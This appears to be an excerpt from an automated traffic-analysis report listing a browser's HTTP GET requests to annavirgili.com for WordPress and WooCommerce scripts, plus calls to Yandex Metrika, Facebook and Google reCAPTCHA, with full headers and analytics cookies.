        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js?ver=1.2.9 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCP/QzgEInNLOAQiO084BGPTJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangeSlider.min.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/slider/js/html_types/slider.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCP/QzgEInNLOAQiO084BGPTJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yandexuid=2276949521734004716; yashr=5720641361734004716
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/slider.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touch-punch.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
